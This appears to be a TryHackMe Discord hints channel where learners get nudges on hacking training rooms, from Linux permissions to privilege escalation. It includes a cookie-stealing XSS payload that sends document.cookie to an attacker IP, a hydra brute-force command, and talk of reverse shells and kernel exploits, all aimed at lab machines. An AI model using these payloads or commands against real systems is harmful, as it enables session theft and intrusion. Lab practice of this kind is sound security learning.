#room-hints

Root flags are normally in /root/root.txt

grr... now i feel dumb

though cd ing out would get me back on my own computers files... didnt think it would stay in the mounted drive

will need some sleep after this

You're in an SSH session on the target

yeah idk what I was thinking... lol

there... done. Thanks again for the help. did alot of rooms today and my brain is fried now. Good night!

hey guys i'm back emm... How do you get your token of discord? i've been trying for a while but well you know

To verify? It's on your THM profile

oh :v

ok... now could you tell why is that the answer please?

hi

hey

you need the ans?

screenshot the scan results

oh ok wait

use flag -vv

instead of -v3

ok wait

ok I got it, now i feel dumb :v

i am struck at privelege escalation on blog.I am currenly www-data user.Any hint would be highly appreciated.Meanwhile I found a database config file which gave me username and password for mysql.is it a rabbit hole?

if you had tried brute forcing with all the users you have found for foothold ..now you know what to do👍

got it man!Thanks for the nudge

just 1 char can make a big difference, no need to feel dumb, you are learning

can anybody help me in this

im doing the active directory room in which we have to bruteforce the usernames using the the given wordlist, but it says no valid username found

Hi, I think what is easy job for just start??
Like maybi web site where y can learn simple thing??

Hello, i'm doing https://tryhackme.com/room/chillhack. Found the rce, and I'm trying to bypass the blacklist. I've been able to list the files with find and seeing the content with grep

but there's no id_rsa key or other things that can grant me access.

I've also see that the php file split with spaces, so i've tried inject payload with ${IFS} notation but nothing, it doesn't execute. Any hints?

I'm stuck on Encryption - Crypto 101 room https://tryhackme.com/room/encryptioncrypto101, task 9 - SSH Authentication, task 1. " I recommend giving this a go yourself. Deploy a VM, like Linux Fundamentals 2 and try to add an SSH key and log in with the private key."

In hints it says "ssh-keygen, ssh-copy-id, or manually copying the key into authorized_keys with cat."

No idea what I should actually do. Like I have the username and password, I can login with SSH just fine. What do I do then? I generated a keypair with ssh-keygen in shiba2, then I tried to copy the id_rsa file with scp but it didnt work. What should I actually do?

also whats the point of all this if I already have the login info

generate the key locally

then add the public key to the target account

yes please... 🙂

oh gods that one

it's more a spec number than a classification

look for a mix of letters & numbers

in the resources the box is giving at the start

It's the best I can give without giving you the answer

we're talking about the same thing?

I am struck in agent sudo enumeration part.Any hints would be appreciated

which part?

Yes I believe so

because I didn't find the answer directly in the resources

me either

and the question wasis poorly worded

yes

the question is totally unrelated to the task

not totally unrelated

Yeah I agree but I did find it in it

apparently it's referred to it that way in some Cisco training materials

But yeah I struggled a lot

I saw the list of IPs, recognized them....

private ip ranges

unless you mean the MITRE material

I gave up like 3 times before trying the RFC thing

i had to get a pretty big hint

I had already try it when I started the room but it kept me saying « wrong answer »

I saw specification written in one of the chats

rather than classification

Yes I did too

then I said no. no. no. that can't be...f

Ahahaha I’ve overthought many times in this room

Especially at that question

so the wikipedia page has it...

assuming you google the right terms

but how are they IOC's

yeah I don't know, I think there was a misunderstanding

it's more the malware checking that you didn't break it's dns

from what I understood anyways

the malware checks to see if the c&c server's names resolve to an internal IP and then deactivates itself if it does

yeah

Takes the prize for most annoying and time wasting question of the month. In the provided log, if you pull up a relevant event, there's a tab for modules within each. It will be at the bottom. For extra hint ||it doesn't have a name!!!!! Hilarious eh?||

Get it & facepalm! I was in the same boat with that one staring at the logs & wondering what I was doing wrong until the penny dropped. Good luck!

lol like the physical pentesting room, I had one or two of those left hanging for ages

ahhh, got it.... like others said, the wording of the question is confusing. Thanks for the advice though, got there in the end 🙂

Good job !

hello guys! need help final task of 0day room. having trouble getting a working ||dirtycow|| binary over to the machine and obv having difficulties compiling it with the ||broken gcc binary|| could i get a nudge in the right direction?

Hey guys could you help to find how can I know what ports is SMB running on?

Nmap

And research

Oh ok i tought that I have to use enum4linux lol

Maybe try dos2unix on that source code and then compile ?

That's to interact with smb.

still having difficulties after trying this

Are you using the ||overlayfs|| one right ?

ah no i wasnt

Try that one

hey man I use the flag -sV and I got this? is this the answer to my question? why does it say "smbd"?

daemon

smb daemon

like sshd

oh ok thanks

another question, I used the flag -M to get the name of the machine but I don't understand what it shows up

it says not implemented

but why?

Do i need to make some update or something like that?

might be worth a check

thanks for ur help

man i made the update but it still says "not implemented in this version of emu4linux"

might need some other way then

not much we can do about it, I'm afraid

so you think that is some code problem or SO problem?

It's a their code problem

So you'll need to find another way to get what you want

Hi hi

How to explore this?

Explore what exactly

@cyan birch is this a tryhackme room?

What room?

Closed ports aren't really useful though.

Yep

And the followup question?

I'm talking about the vhosts

What room is this?

I'm exploring website

Wekor

Come back in 7 minutes with a proper screenshot

Ok XD

Yoo

Yoo

im stuck on a box

giving hints here is fine ?

Idk

anyone did the marcket box ?

What is the name of the room?

The Marketplace

im stuck on the priv esc

I'll try

i found a backup script can run by an other user

it has a tar wildcard but i dont know how to use that on my side

i dont wanna check out the writeups

Fortunately that's what this channel is for

#room-help is for after you've checked the writeups

i checked and its far easier than i thought lol

¯_(ツ)_/¯

Sometimes the simple answer is the right one

Did you check /home

the robots.txt doesnt only have the flag1 it has more

what domain name did u used ? I tried with my IP but it didn't worked and I can't edit the /etc/hosts

what room?

dnsmanipulation

still under embargo

its a walkthough lmfao

still

the domain is mentioned

idk it says that we don't need a DNS to complete the room but it asks one on the python program

we used the one by default ?

No, not still.

Walkthrough rooms are not covered under the embargo

what is this embargo about ?

which task

the 7

hmm strange. there was another walkthrough recently where it was embargoed

Not overly relevant right now, but Rule 13 states a 72 hour period where no help/hints can be given for challenge rooms.

oh ok sry

linux agaency is the only challenge I can think of like that

It's not a challenge room so you're fine

ok

which question

the first one

just run the script as mentioned

python3 ..... packetyGrabber.py

it will ask for the filenames etc

I retryed the same command but it worked this time

Do not provide or ask for help or hints for the Broker room until 13th March, 7pm (GMT)

😫

I had to tweek my commands a bit to get it to work the first time as well

but if you follow the example from the task before you should get what you need

yeh sry having bothering u

not a bother, we are here to help

one of the script seemed broken here, but a few lines modded and it worked

my issue was around command structure vs the script, but if the script is broken you should put it in #room-bugs so it can get fixed

dont recall exactly what the problem was. something with python3 not being new enough to accept the new f"fo fo {foo} fo fo" format

Guys could you help me? How can I access to those files? I was reading about the smbclient commands but I couIdn't find something useful

you would need to either copy them to your machine or try a command like less or more

Ok the task says that I have to assume who this profile belongs to. Could you help with a hint?

which room is this

network services 1

check the Work from home doc

that one would the most likely to give you some hints to go off

did you use the tshark command to find the domain names to use?

yeah I was thinking that file look interesting, so to check the file i need to copy it to my machine, right?

yup

I may have made a mistake on the command I managed to deal with it

ok, I'll try that. Thanks

ok

thx

do an ls -la

to find out about who owns the files

I tried to copy the file but I got this

try get

ok i did it, so what's the difference between get and scopy?

the program, smbclient has some built in commands for copying

Ok I noticed that the new file was created in my home directory, how can i change the location of the new folder?

new file*

on your machine, smb will put it where you launch the app from, if you want it somewhere else you can just copy it to the folder

oh ok very useful information

Guys I got stuck here could you help with a hint?

last question of the task 4 in network services 1

guys i'm doing the madness room and i found the hidden directory and it's saying to obtain my identity you need to guess my secret
i think it's a stego thing with the picture i used stegcracker with a wordlist of numbers betwen 0-99 but it didn't work

what should i be doing?

Forget the picture 👀

What kinds of inputs can you put in a webpage?

what do you mean with webpage inputs

i tried gobuster
but i'm sure that's not what you are talking about

dont look for directories

how can you do a query in an url?

using curl?

search what's a query string

or is it "?" like when u have an RCE

the query is whatever follows the question mark in a url
but there's need to have an identifier such as "q" letter in most websites
should i append "?q=<number>" ?

how do i know what is the appropriate identifier

There’s something very specific the site is looking for. The name of the parameter is easy enough to guess from the words on the webpage.

ok i guess it's ||secret||

@short fox @woven mirage it worked guys thanks
i got some weird username but i'll solve that my own
just wanted to say thanks

no problem

Absolutely

could someone help me?

did you copy the key

yeah and I changed the permissions

run the command ssh -i <keyname> <user>@<ip> and you should connect to the host

ok but how do I get the username?

you can try the first name that you found earlier

oh really?

I was expecting something more complex ._.

this is a learning box, many of the others don't always directly give you it

ok

I tried what you told me but it says connection closed by port 22

I think that I did something wrong

Wrong username

@atomic sail Please don't ask the same question over multiple channels

I tried with John, JohnCactus and Cactus

First things first, unix usernames are ALWAYS lower case

ok I didn'y know that

didn't*

Oh shit I did it, It took all the day just to complete the task 4

I am stumped: Alfred

• Got Powershell reverse shell via Netcat
• was able to upload the msfvenom generated exploit to webserver
• Instantiated Metasploit /multi/handler

• ran paylod, established connection to Metasploit
• metasploit accepts connection but not "Meterpreter" indicating i can run commands. When I enter commands, nothing but a blank screen

Did you set your payload in multi/handler to the same type that you generated?

checking... but I already see what you are saying. My venom was not set to that payload type... Doh! Thanks for the tip!!!!

These mistakes would not be made if I just copied and pasted... forcing myself to do it without script kiddying.... 😦

They would.

hahahahaha, right!

The default payload for multi handler seems to be all over the place, and I think people often forget to set it

You're right... once i popped options lightbulbs hit

Hey Friends, I'm in Psycho Break - the Evil Within themed room; in the 'Safe Heaven' I uncovered something that indicates it is a Base64 encoded string, but it doesn't decode properly. Any hints on this issue?

Hm, looking at a few hints online leads me to believe I may have just spent 60 minutes deep down a useless rabbit hole with this Base64 idea lmao

I am doing brokerv10 room. I am confused on 3rd questions is mqtt client a service or a tool?how to use this mqtt client. Googling gives some mosquitto_pub

I dont want anything related to question. Just what is mqtt client

Hi guys I am solving Madeye's Castle.I found|| access to smb share for harry|| but dont know how to proceed.Tried bruteforcing ssh with the spell list found from smb share but no luck.A nudge is needed😊 .Thanks in advance!!!!

Can't hint on that room yet, but google should be able to help

There's http if I'm not mistaken, but you need to do something before it will send you to the right place

That wordlists is important for later

It directed to default apache web page.Tried web directory enuemration with 2 seperate dirbuster direcotries but no success.I will try with some different directory for now

There should be some info gleaned from SMB about the machine name

yes it gives information about the machine name

it doesnt require bruteforcing right?

There's probably more than one server running on that port, don't you think?

The brute forcing comes later :p

i cant figure that out yet.Something new for me I guess😅

look up vhosts

hi, is anyone have a script to get the messages about videogame for question 3 in "broker" room?

@untold fulcrum see pinned message

it's good I found another way

can't help on new rooms for a few days after release

@ripe hedge ok no problem. I rooted the box anyway

HELLO People I'm in hackpark room I generated msfvenom shell and upload it

when I run it over the target windows server it shows the meterpreter started but no shell received, as appear here

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.8.124.XXX:44XX

@untold fulcrum

Hello

Guys, I have question regarding room broker

apache_activemq_upload_jsp is right or wrong exploit?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

That last bit. It's still under embargo.

oh

I'd like to use this time and place to wish the person at oracle deciding to put the java package behind mandatory registration a hedgehog surprise in their next poop

the JDK?

yeah don't use Oracle's

nmap -sC -sV -T4 -A 10.10.149.120 -o scan.nmap

Where did you find that IP?

Is that the right command to find the port 3333 on vulnhub

Vulnhub?

top right of my attack box

Yes

That's your own IP

Not the target machine

And you're talking about vulnversity. Vulnhub is a different platform.

Vulnuniversity

Click the green deploy button in Task 1

Use the IP under Active Machine Information

Thanks, no help needed now ❤️

Which wordlist should I use to find the form, I'm using gobuster

Just pick a directory wordlist

Uploaded a shell to the vulnuniversity site, how do I do this question:
What is the name of the user who manages the webserver?

I believe I must run a command in the shell to send all usernames

You uploaded a shell. You need to get the webserver to run it, and get your reverse shell.

I did, I have cli access

Do I have permission to add you and share a photo of my work so far @stuck fractal ?

!docs verify

Follow that link, verify with the bot, then you can post screenshots.

I am about to ask a question which seems a bit stupid tbh

Done

I am solving the madeye castle room.I found the login panel (vhosts).I know the username but How can I bruteforce it with hydra??

How do I find the name of the user that manages the apache web server?

here is the command I am using hydra -L Lucas Washington -P spellnames.txt 10.10.24.241 -server hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:The password for Lucas Washington is incorrect" -Vv -f -t 15

Maybe look for people that use the box

It's not asking for who the webserver is running as

Finished it

Thanks bro

Please don't call me bro.

I need help with the Broker room, task: Which videogame are Paul and Max talking about?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

you probably won't be able to bruteforce that

there are other ways in

yo, for the room broker, what M**T client should i use?

I'm trying to work with a python script but it's kinda shaky

oh, rule 13

nvm

Hi guys. I got stuck in the task 7 question from network services 2. I know that I have to write that command line but where? in my telnet connection tab? Do I have to put .RUN before the command line? and how do I know which is my lport?

msfvenom is a hacking tool

It will not be installed on the target machine

You need to run that command on your own attacking machine to generate a payload

The payload is just a series of Linux commands chained together to give you a reverse shell

Ok thanks that solve some questions, now how do I know which is my lport?

It gives you one in the command

But it's arbitrary

found|| sqli||

exploit it then

just to be sure. Is the lhost my attacking machine's ip or my target machine's ip?

It's the IP that the reverse shell will contact back to

So your attacking machine's IP. Specifically the THM VPN IP

oh ok thanks yeah

Please. Do I have to run that command line everytime that I want generate a payload?

It's one of many ways to generate a payload

You don't have to use msfvenom, and you can just change values in the payload if you want

ooooh thanks

I am having an issue with the Simple CTF room. I have compared with the writeups but I am stuck with the CVE when I try to run it myself. I have tried with python and python3. I have also modified the print to include () around so it shows up as print("themessage"). The script runs when I do that but I only get this: [+] Salt for password found: 2eavUt
[+] Username found : r
[+] Email found: dg
[+] Password found: 8f

already finished Broker ,is great room

Now that you've learned basic file operations, you can solve the first challenge! This challenge is pretty simple, create a file called noot.txt.

Once you're done run the binary and you'll be given the password for the user shiba2!

Note: the name of the binary is shiba1, as shown in the title

What's the password for shiba2

ok so I type cat > noot.txt but nothing happens

Why are you trying to type cat > noot.txt?

because it is the command the create a file on linux

in terminal

isn't

May I ask where you learned that? Seems inefficient.

https://linuxize.com/post/create-a-file-in-linux/#:~:text=To create a new file run the cat command followed,D to save the files.

Try using touch [file_name] then ls to make sure the file is there. If it is, run the binary, if it is not then the box is broken. If you run the binary and nothing happens, it is probably broken. Restart the machine and try again.

I was just in another site trying this

so touch filename

but it doesn't show anything after touch [file_name]

Hm?

What do you mean?

oops not well centered

better

if it shows any answers I am sorry

Uhh

You're meant to be doing it on the box, not your own machine 😁

but in the machine it does not show anything

nvm

it works

ty for the help! 😁

No problem 😁

Actually

it does not show the password

Hm?

That is the attackbox.

Not the linux machine.

oh

You see the "start machine" button.

Click it

ah

ok ty

ok so now I need to run it

why does it say permission denied

Screenshot?

You cannot execute a text file

You need to execute the binary.

The binary is called "shiba1" as the task tells you 😄

oh

yay!

I got it right

tysm for the help!

No problem! Happy hacking.

ty

For reference, you totally can

They're scripts

James
Stop being smart for a moment

guys could you help with a hint here? task 10 from network services 2. I have to crack the password but I'm not sure if the password is in that file? Where could I find the file that contain the posible password?

So when you give a file as a password file it'll try each line in said file as a password (in this file's case it being full sentences etc.), try to see if you can find a password list file.

yeah but if I type ls in the ftp server it just shows me that file ("PUBLIC_NOTICE.txt") and I can't see any other directory

The password file you wanna use isn't on the server, the password list should be pre-installed with your Kali.

pre-installed with my kali? sorry I don't understand

It should already be on your kali machine, it's a list of common passwords that's widely available online.

Otherwise known as a wordlist, try to reread the material for task 10 with this information.

Oh great it was like rockyou.txt.gz

I had to change de permissions and unzip the file

Ah yeah, I forgot it's gzipped by default, glad you figured it out :)

yeah I swear I couldn't do it without you

im stuck on battery room would asking for a hint

im *

please elaborate

how can i make a null byte string

to bypass php checking ?

%00

imma try

its worked but it returning it as *****email.a%00

at the end

use spaces

this is a SQL vuln

Hey guys, the Blaster room's browser history has been deleted which i needed for a task. Can any1 help, please.

I put 10.10.59.12 but get this

Connect to the VPN

with the open vpn?

yes

The tryhackme VPN.

so the blured part?

No.

What IP is that? Where did you get it? What room?

it is from openvpn connect

What

Not the IP you redacted.

I am confused rn xD

The 10.10 ip you mentioned before.

yes

https://tryhackme.com/room/linux2

what os are you running?

task 3*

I can run all three

but which one are you connected to the vpn with?

I did download putty on windows

the vpn?

OpenVPN is on my macos

run the openvpn on the same machine as putty

ok I am downloading the openvpn on windows rn

brb

so I put that ip?

No.

ohhh I get it

my private ip

No.

oh

You are SSHing into the VM you deployed in the room

Hence, you need the IP of that machine

so the ip of vmware or the machine in tryhackme

oh

nvm

I get it now

ty for the help!

🙂

ok so I entered the password and it won't let me

and I used shiba1

Where did you find that IP?

Where on the page?

middle top

Read the text again :)

(Note: the 10.10.10.10 is just an example, and you should replace that with 10.10.61.74)

Read the text you sent in the screenshot again.... Should've been more specific lel

so I put the wrong ip?

shiba1 will work

yea I did shiba1

If that's the point you're trying to make

Oh, will it?

but the password don't work

Yes

From here, the machine isn't even up

it is not?

I'm connected to the VPN and I cannot ping it

I need to stop the vpn?

Terminate and redeploy the target

so I need to stop my openvpn?

ok it is stoped

That is not what I said

but what is the target?

Restart the box on the tryhackme website @brisk pivot

ok

You need to deploy it in order to have an ip address to connect to

Once it’s deployed you’ll see the target IP that you’re attacking on the web page 🙂

so this is what I am attacking

Yup just under IP address that is your target

so 10.10.39.96

Keep an eye on the timer as if that hits 0, the box will shut down

ok

so I would have to do shiba1@10.10.39.96

Yeah

ok

Everything that goes on within that lab will be on 10.10.39.96

and I need my openvpn connect otherwise it won't work correct?

the password still does not work

Yup so you'll need to connect to openvpn otherwise you won't be able to connect to any rooms on the platform

optional may I dm you with the password that i used to not spoil it to everyone?

it should be shiba1 if you're sshing into shiba1

Think of it this way.
workflow

1. Deploy the room on Tryhackme.
2. Connect to the Tryhackme network using openvpn, you will be able to download the connection pack from https://tryhackme.com/access and once downloaded you should be able to connect with openvpn like `openvpn <your username>.ovpn`
3. you should then be able to interact with the IP address tryhackme gives you

oh ok I got in

ty

I think you're meant to use shiba2 with the password you got in the last room?

(╯°□°）╯︵ ┻━┻

Can anyone nudge me in the right direction for the OWASP top 10 room for XXE?
I'm trying to figure out how to use XXE to find where the SSH key is located.

It's in the default location for a user's SSH key

Thanks, I figured that was the case but I think the answer is asking for the filename and I don't know what that should be.

Where is falcon's SSH key located? This one?

Actually, it turns out I did know what it was. But I thought I was supposed to understand how to run ls or something using XXE

Full path.

XXE tends to be just files. You have expect: but that isn't enabled often

Ah right. I found expect:// online but it wasn't working. I thought I was doing something wrong.

Thanks.

I'm stuck on something that should be super simple. This room: https://tryhackme.com/room/toolboxvim has a question in Task 2 that reads "How do we start entering text into our new Vim document?" and it's looking for a six letter answer. I can't seem to find it. Isn't it just i to enter insert mode? I've already answered everything else in this room, so it's just this one thing I can't get the syntax on.

It's something you do once you're in insert mode

Same thing you did to send that message here

🤦‍♂️ thanks

It's a brilliantly dumb question

agreed :). And here I was man'ing, grep'ing, and googling for long versions of the insert mode command

can anyone help me with the looking glass room

what have you tried sofar?

yet to get the secret passphrase

@gusty kite i ||tried to decode the cipher poem at the port .||

but still the key doesnt work

yeah look at the end of that

thats your secret

|| burbled ? ||

err sorry. the key is the secret

at least it was for me

thats what , the key doesnt work .

are you sure? it closes the connection but gives you the creds

yep , i am sure . i am tring it past 1 hour

what length did you use for the key?

20

that should be fine

did the same key work for you ?

ok I think I know the problem. you used the autosolver which is fine and all but once you get the proposed key, then fill that in and re-decode using that

then you will get it at the end of the text.

ah

got in @gusty kite thanks 🙂

@digital vector its at sneaky funny room. Very well done

Has anyone tried solving broker ?

I tried the metasploit module to upload, but it didn't worked.

If anyone can help ?

I'm pretty sure broker still falls under the rule of no hints for 72 hours after release.

I understand, alright I will keep trying.

You should be able to ask about it tomorrow in the evening (atleast evening UK time, GMT)

im still working on it but i think there's a bug

hi guys

i was doing the linux agency room

and it tells me that a password is wrong even if it says it is correct on tryhackme

I've just finished with no issues

@novel bay pic please

Along with exactly what you typed

i figure it out

they're not the same

cause they're not intended to be used

but i did it in an "uninteded way"

and it asked the password for sudo -l

there is room for a bit of error in the thm input box so you can actually write something a bit wrong and get it accepted

no it wasn't that

i triple checked

the password was not set for the user

even if there is a flag

hello y'all. Would it be fine to use metasploit for Skynet room, or that's like you can do it but you're missing the point

it's a walkthrough, right?

IDK where you'd use msf in it?

I did not want to read a walkthrough, I was thinking there could be something Samba related, but I could be totally wrong

I think the room is walked though.

I wasn't telling you to read a writeup.

Eh it's somewhat guided

I don't think you'd get very much value using MSF on that room, I don't think it'd be that useful

ok, thanks

was just doing new room badbyte and the room has disappeared from the website? although im still connected to it

That was the challenge one, that was made private otherwise there would have been too many points if you're in badbytemq join badbyte

oh right, maanged to get a few points out of it so 😂

yep, same here😅

can i ask for hint in badbyte?

i mean it's a walkthrough room

https://tenor.com/view/ffs-baby-really-oh-god-just-stop-gif-12739180

which task ?

task 5
i think i know the version of the cms but i couldn't find any lfi exploits for it

read the first line in that task and look at the hint for the LFI question

refresh the page

it has been updated

actually the hint from the "Can you find any vulnerable plugins?"

🙂

yup i couldn't understand that hint

it's || 4.9.5 || right?

i meant the room tasks are updated

"Use nmap to scan for the vulnerability in the CMS that is running on the webserver. Nmap has a script that can find vulnerabilities in the CMS which used in this machine."

|| i used http-worpress-enum ||

led have u finished the box ?

it didn't work

i made the box

oh my B lol, its a nice box

thnx

lol good job

i liked the port forwarding

yeah that was kinda main part

yeah good box

so are hints and help allowed for it ??

yes

um

cracking the pass is a bit tiresome

it is walkthrough room

im stuck on the priv esc part

cracking what

cant seem to find the pass

linpeas should find the files

linpeas did not find anything of interest

"Management now requires SSH sessions to be logged." is it related to adm and the auth.log ???

my eyes hurt from searching in the log dir for a pass

I was going for the pass for user in the wordpress db

Do not provide or ask for help or hints for the h4cked room until 15th March, 7pm (GMT)

don't cause even i don't know the pass

same problem 😂

did you also read the final task

first bullet point

you are close

its almost 2:30 am here 😩

4 for me

there is always tomorrow or is there

not gonna be able to sleep if i dont root it

ughhh i cant believe i missed this

think i got it

found it

same

ahhh what a pleasant sight

interesting why it did not show up in linpeas

it did

make sure your tools are updated

the filename i mean

maybe bc its not owned by root but readable by the cth user only

like if it was in the adm group

I even tested with the one you left behind 🙂

Anyways great box, hope to see more

you guys know i like vim

also vim has logs

actually used that to find the config file for wordpress 😄

love vim

wrote a few books about it many years ago

👀

📖

my putty does not work

thanks

putty in what?

for what room

Linux Walkthrough (Web-Based) p.2

Connect to the VPN.

oh

right

oops

I'm stupid

ty

😅

I forgot that

no such file or directory

but why

I just did what they did in the image

the image:

Because the shell is looking at the value of $nootnoot and putting it in

You aint doing what they did in the image

You're throwing variables in there

I did: cat test

Ok

There isn't a file called test there.

so in the picture they already have one?

The images are illustration. They are not instruction.

oh ok

Also note that they're in /tmp/ll

sounds good 👍

ok

ty

is shiba2 a file?

Please provide some more context to your question

nvm

I think that I found the answer to my question

can anyone help me out ive been stuck on task 5 "What is the CVE number for directory traversal vulnerability?" ive ran wpscan and nmap and im getting false psotives

im trying to figure out what cve that word press is vulnerable to but im might be doing something wrong

What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file?

I don't get this question

have you checked data exploit idk?

When you are asking for hints with rooms, you NEED to state what room it is. And what task, and what question

We need context.

hold on

Digit Meaning
1 That file can be executed
2 That file can be written to
3 That file can be executed and written to
4 That file can be read
5 That file can be read and executed
6 That file can be written to and read
7 That file can be read, written to, and executed

and I ned to type per example : 123

like the code

That is not what I asked for at all.

oh the room

What room is it? What task number? What question?

That's the bare minimum of information you need to provide.

Linux Fundamentals Part 2 Task 15

first question

Ok. So do one digit at a time.

What's read only?

Wait before that

What order are the three digits?

wait imma just recheck the instruction

hold on

first digit controls a permission for a user the second is for a group and the third is for everyone

So that's usually stated as user, group, other

ugo

So let's go in that order

What should the perms for the user be?

(owner = user)

should I have my putTY open?

or I don't need it

You'll need it in a bit

ok imma just start that up

ok I have it open

how you are asking what are the user perms?

So, the question says?

user can read the file, the group can read and write to the file, and no one else can read, write or execute the file.

it says that

Yeah. So the owner/user.

We're doing this one digit at a time.

yes

What should the perms for the user be?

so the first one is 4 because 4 is "that file can be read"

Yeah.

And for Group?

I think 6

Ok, and how about others?

The last digit

but it says write OR execute the file

and I just find AND

it would be 3 if it would be AND

You're thinking too much

it would not.

I am?

Read Write OR Execute

None of the three

3 would be write and execute but not read. You don't want them to be able to do anything

They shouldn't be allowed to read or write or execute.

so it is none?

None is not a number, so no.

ok so if none is not a number 0 is

Do you know how you arrive at the numbers?

Because it's by adding 1, 2, and 4

1 is execute, 2 is write, 4 is read

So 1+4 = 5 which is read and execute

1+2+4=7, rwx

0 is none of those so no perms

so it would be 4,6 and then 0?

because there is no perms

Yep.

oh yes!

I was over thinking

arguably, there should be a comma no one else can read, write or execute the file. should be no one else can read, write, or execute the file.

so if something is not in the list it is a "0" because it has not perms is that it?

The permission digit is made up by adding 1,2,4

yes

true

So 0 is no permissions.

It ticks none of the boxes

oh ok I think I get it

I got one on my own

ty for the help 👍

it's something you'll get used to with practice

yes

i have a question regarding owasp top 10

Just ask it.

Always ask your question directly.

i can't find the .db file in task 11

while inspecting

hello?

Firstly, please be patient

Secondly, you've leaked your name in that image along with most of your email

Thirdly I don't think you're going about it the right way?

but is it necessary to hide my name?

cause i have the username same as my name

I mean I'm just making you aware.

ooh

thanks

Did you answer question 1 in that task?

yes

So why the heck are you on the login page?

to find the .db file

It literally says at the start of question 2 to navigate to the directory you found in question 1

So why are you at the login page?

The login page is not the directory you found in question 1.

?

how can i navigate to it?

Don't post answers.

ooh

ok

You navigate to it by putting it in your navbar.

The address bar.

After the IP.

ok

thanks

it worked

yessss

If you don't understand the instructions, ask. Better to ask than to ignore the instructions and look at the wrong page totally.

thank you once again

Please do not call me bro.

ooh ok

Stuck on Task 11 in the OWASP TOP 10 room

I already found the password hash using sqlite3 and cracked it but when I type the given password using 'admin' as the user it gives me an error 'invalid credentials' message

Nevermind - it has been solved*

@white salmon do not post answers.

Especially not in room hints

I thought I added the spoiler ? @stuck fractal

Anyway, I apologize

Hello. I am stuck on room: Content Security Policy, flag for attack-5. I can't get document.cookie and tried everything I could think of, even read writeup and example writeup gave me didn't give me results. Is there anything wrong with this room?

my payload is this

<script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='http://10.10.228.138:8080/'.concat(encodeURIComponent(document.cookie)))"></script>

what am I doing wrong?

Hi. I'm currently in the network services room, but there is target mentioned. How should I start my scanning?

I need a nudge for enumeration on tomghost.I tried directory bruteforcing with different directories but no success.Also tried enuemrating dns but no success.

there must be a machine for deploying along with the room

Indeed. I deployed it, but I don't have a target ip.

I'm connected in the machine, but I don't know on which IP to run nmap ( nmap ????)

The IP under active machine information @arctic light

If you don't have one, then you haven't deployed the machine. Maybe you deplyed the attack box instead.

@stuck fractal yes that's my case. thanks

ok so im doing badbyte. i need help I've been at it for hours trying to figure out exactly what cve the cms is vulnerable to i used wpscan to scan for vulnerabilities and still every time i submit the answer to task5 Q:

What is the CVE number for directory traversal vulnerability? i get the wrong answer can anyone give me a tip on what i should do?

don't use wpscan 🙂

use the tools that walkthrough suggests

well it says to Scan the internal web server and find vulnerable plugins using Nmap or the popular scanning tool for this CMS. isnt wpscan a popular tool for wordpress

@median reef what nmap script should i use

sorry for tagging you

no prob

if you are using wpscan make sure it is updated

when creating the room it could not find the plugin

so what should i do then use nmap

ls /usr/share/nmap/scripts/ | grep [cms-name]

you will find interesting scripts there

thanks

this is the outut i got does this look right http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse

🙂

yes

use the suitable

the enum

🙂

ok so it should tell me what its vulnerable to right?

it would give you list of plugins

you can read the script if you want more info

so basically just take that list and research

yeah

you can read about the scripts on nmap site

trying to do the rick and morty room, and I'm a little stuck on the third ingredient anyone able to give me a nudge in the right direction?

Ahh never mind I've found it.

on badbyte do i need to bruteforce login

on ssh?

no wordpress

ok so on badbyte when using the metasploit exploit what file is import to look at im still stuck on figuring out what rce its vulnerable to

if you use wpscan it can help you find users

i already have to username just trying to figure out if im supposed to use the traversal attack to get the password or whatever

lol

on badbyte can someone give me a hint on how to figure out What is the CVE number for remote code execution vulnerability? i have the one for the traversal but. i've been searching and im stucl

stuck*

did you found plugins?

no

Did you increase the search limit as suggested in the hint on the box?

Can someone explain me this question from room h4cked || The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

badbyte - this hint gives me ssh error.. What am I doing wrong?
My command looks like this|| ssh -i id_rsa -L 8080:127.0.0.1:80||

What's the error?

That aint an error

Right, but it's wrong usage

and I'm doing what the hint says, right?

You're misinterepreting the hint but yeah

led, you wanna take this one?

yeah sure

the command is incomplete

you still need to specify the ip of the box and username

roger, ty

should be part of the hint I guess. First time I use proxychains like this for port forwarding

I mean you could look up examples

Or realise that you're not specifying enough information, because it won't know where to do stuff

This is probably more of a tech support question than a room hint, so I apologize if this is the wrong place to ask. In the BadByte room, task 4, proxychains/port forwarding, I'm having trouble getting the 'proxychains nmap -sT 127.0.0.1' command to work. It's reporting all 1000 ports are closed. I've exited the /etc/proxychains4.conf (I do not have a /etc/proxychains.conf- should I create one?) a few different ways, from information found through google. Uncommented dynamic_chain, commented out socks4 127.0.0.1 9050, added the socks5 as per the instructions in the room, and also tried with and without the proxy_dns line commented out. All with the same result- 1000 ports closed. I currently have two terminals open, one is actively logged into the ssh machine using the id_rsa found previously. Any tips/suggestions?

@worn otter I found some help on this page https://netsec.ws/?p=278

Thats how I made it work anyway

try using proxychains4

thanks, @stark reef ,I'll read it

since your changing the conf file for that

using proxychains4 with same args as above reports 1000 ports closed

Find and extract the script they used in the PCAP, the info is in there

what command are you using for port forwarding ?

run netstat (or ss) -tunlp and make sure the port you specified is listening on your localhost

So I think the missing piece was that I had not already started ssh in -D mode before running the proxychains command

yup thats it

thanks to @cloud perch for the hints as well

btw for badbyte dynamic chain =/= dynamic port forwarding

the room can work with strict chain if other proxies are commented out

thanks for the tip. I'll try that as well

🙂

room hint for privesec with /bin/systemctl

GTFObins

thanks

